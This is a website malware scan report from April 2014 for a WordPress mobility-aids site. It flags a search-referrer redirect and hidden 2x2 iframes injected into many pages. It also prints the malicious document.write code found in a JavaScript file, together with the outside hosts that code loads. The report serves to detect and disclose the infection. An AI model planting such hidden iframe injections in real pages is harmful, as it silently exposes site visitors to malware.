Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://helpwithmobility.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: helpwithmobility.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 12 Apr 2014 15:32:05 GMT Location: http://appleseedinc.com/arpu.html?h=3161134 Server: Apache Content-Length: 227 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://helpwithmobility.com/ | 200 OK Content-Length: 32872 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> | ||
http://helpwithmobility.com/wp-content/themes/breathe/js/suckerfish.js | 404 Not Found Content-Length: 17089 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> | ||
http://helpwithmobility.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 95346 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://appleseedinc.com/arpu.html?j=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/arpu.html?j=3161134> Hidden iFrame found. size: 2x2 src: http://kirtidan.com/mqpn.html?j=1962903 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kirtidan.com/mqpn.html?j=1962903> Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/wrpu.html?j=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/wrpu.html?j=3161134> | ||
http://s.gravatar.com/js/gprofiles.js?ver=2014Apraa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://helpwithmobility.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.4.2 | 200 OK Content-Length: 930 Content-Type: application/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201415 | 200 OK Content-Length: 9168 Content-Type: application/x-javascript | clean |
http://stats.wordpress.com/e-201415.js | 200 OK Content-Length: 2346 Content-Type: application/x-javascript | clean |
http://helpwithmobility.com/about/ | 200 OK Content-Length: 19353 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> | ||
http://helpwithmobility.com/wp-includes/js/comment-reply.js?ver=3.4.2 | 200 OK Content-Length: 1272 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/arpu.html?j=3161134></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/wrpu.html?j=3161134></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kirtidan.com/mqpn.ht Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://alicebangkokescorts.com/wrpu.html?j=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://alicebangkokescorts.com/wrpu.html?j=3161134> Hidden iFrame found. size: 2x2 src: http://kirtidan.com/mqpn.html?j=1962903 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kirtidan.com/mqpn.html?j=1962903> Hidden iFrame found. size: 2x2 src: http://appleseedinc.com/arpu.html?j=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://appleseedinc.com/arpu.html?j=3161134> | ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21950 Content-Type: text/javascript | clean |
http://helpwithmobility.com//www.google.com/cse/brand?form=cse-search-box&lang=en/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Sat, 12 Apr 2014 15:32:15 GMT Pragma: no-cache Location: http://helpwithmobility.com/www.google.com/cse/brand?form=cse-search-box&lang=en/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 12 Apr 2014 15:32:15 GMT X-Pingback: http://helpwithmobility.com/xmlrpc.php | clean |
http://helpwithmobility.com/www.google.com/cse/brand?form=cse-search-box&lang=en/ | 404 Not Found Content-Length: 17089 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> | ||
http://helpwithmobility.com/mobility-scooters/ | 200 OK Content-Length: 26242 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> | ||
http://helpwithmobility.com/wheelchairs/ | 200 OK Content-Length: 22512 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> | ||
http://helpwithmobility.com/beds/ | 200 OK Content-Length: 23292 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> | ||
http://helpwithmobility.com/mobility-accessories/ | 200 OK Content-Length: 22613 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://turf-times.de/wrgn.html?i=3161134 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turf-times.de/wrgn.html?i=3161134> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=helpwithmobility.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://helpwithmobility.com/
Result: helpwithmobility.com is not infected or malware details are not published yet.
Result: helpwithmobility.com is not infected or malware details are not published yet.